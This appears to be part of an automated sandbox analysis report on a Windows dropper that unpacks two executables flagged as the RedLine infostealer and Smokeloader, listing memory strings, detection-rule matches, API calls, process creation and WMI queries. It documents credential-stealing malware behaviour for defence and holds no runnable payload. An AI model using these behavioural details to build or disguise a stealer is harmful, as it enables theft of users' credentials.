                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000005105000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000005199000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002A27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000005105000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                    Source: uPD30tM82.exe, 0000000E.00000002.435203327.0000000002A27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                    Source: uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14V
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002A27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002A27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response

                    System Summary

                    Source: 1.2.twl97yF91.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.3.W7ANVukbbj.exe.4a26820.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.2f97bc6.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.2cb0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.2f96cde.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.3.W7ANVukbbj.exe.4a26820.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.4b10000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.3.twl97yF91.exe.2d50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.76c0000.6.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.4b10000.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.3.twl97yF91.exe.2ecf3b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.76c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.4b10ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.2f97bc6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 14.0.uPD30tM82.exe.2b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.4b10ee8.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.2f96cde.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.3.twl97yF91.exe.2ecf3b8.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000001.00000003.256499672.0000000002D50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000001.00000002.322917583.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000001.00000002.333480133.00000000076C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000001.00000002.322292427.0000000002E68000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: W7ANVukbbj.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00861F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00861F90
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00863BA20_2_00863BA2
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00865C9E0_2_00865C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_00408C601_2_00408C60
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_0040DC111_2_0040DC11
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_00407C3F1_2_00407C3F
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_00418CCC1_2_00418CCC
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_00406CA01_2_00406CA0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_004028B01_2_004028B0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_0041A4BE1_2_0041A4BE
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_004182441_2_00418244
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_004016501_2_00401650
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_00402F201_2_00402F20
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_004193C41_2_004193C4
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_004187881_2_00418788
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_00402F891_2_00402F89
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_00402B901_2_00402B90
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_004073A01_2_004073A0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB2B171_2_02CB2B17
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB18B71_2_02CB18B7
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB786D1_2_02CB786D
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CC89EF1_2_02CC89EF
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB31F01_2_02CB31F0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB31871_2_02CB3187
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB8EC71_2_02CB8EC7
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB7EA61_2_02CB7EA6
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CBDE781_2_02CBDE78
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB77D91_2_02CB77D9
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB6F071_2_02CB6F07
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CCA7251_2_02CCA725
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CC8F331_2_02CC8F33
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CC84AB1_2_02CC84AB
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB2DF71_2_02CB2DF7
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_030520B91_2_030520B9
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_030520C81_2_030520C8
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_03051DAA1_2_03051DAA
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_03051DB81_2_03051DB8
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeCode function: 14_2_0260F36814_2_0260F368
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: String function: 0040E1D8 appears 44 times
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: String function: 02CBE43F appears 44 times
                    Source: W7ANVukbbj.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 294082 bytes, 2 files, at 0x2c +A "twl97yF91.exe" +A "uPD30tM82.exe", ID 2151, number 1, 18 datablocks, 0x1503 compression
                    Source: W7ANVukbbj.exe, 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs W7ANVukbbj.exe
                    Source: W7ANVukbbj.exe, 00000000.00000003.255075633.0000000002E0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVaccinium.exe< vs W7ANVukbbj.exe
                    Source: W7ANVukbbj.exe, 00000000.00000003.254929355.0000000004A26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVaccinium.exe< vs W7ANVukbbj.exe
                    Source: W7ANVukbbj.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs W7ANVukbbj.exe
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe F10032D8E8F46511F815FE1AA9B94C8D72D3923E0768E426A513B55CEA07E8E6
                    Source: W7ANVukbbj.exeReversingLabs: Detection: 71%
                    Source: W7ANVukbbj.exeVirustotal: Detection: 48%
                    Source: W7ANVukbbj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\W7ANVukbbj.exe C:\Users\user\Desktop\W7ANVukbbj.exe
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeFile created: C:\Users\user\AppData\Local\Yandex
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/4@0/1
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_0086597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_0086597D
                    Source: uPD30tM82.exe, 0000000E.00000002.435203327.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00863FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00863FEF
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00864FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00864FE0
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCommand line argument: Kernel32.dll0_2_00862BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCommand line argument: 08A1_2_00413780
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                    Source: W7ANVukbbj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: W7ANVukbbj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: W7ANVukbbj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: W7ANVukbbj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: W7ANVukbbj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: W7ANVukbbj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: W7ANVukbbj.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: Binary string: wextract.pdb source: W7ANVukbbj.exe
                    Source: Binary string: wextract.pdbGCTL source: W7ANVukbbj.exe
                    Source: Binary string: ,C:\fokizacawova\vamisobel.pdb source: W7ANVukbbj.exe, 00000000.00000003.254929355.00000000049C9000.00000004.00000020.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000000.255172921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, twl97yF91.exe.0.dr
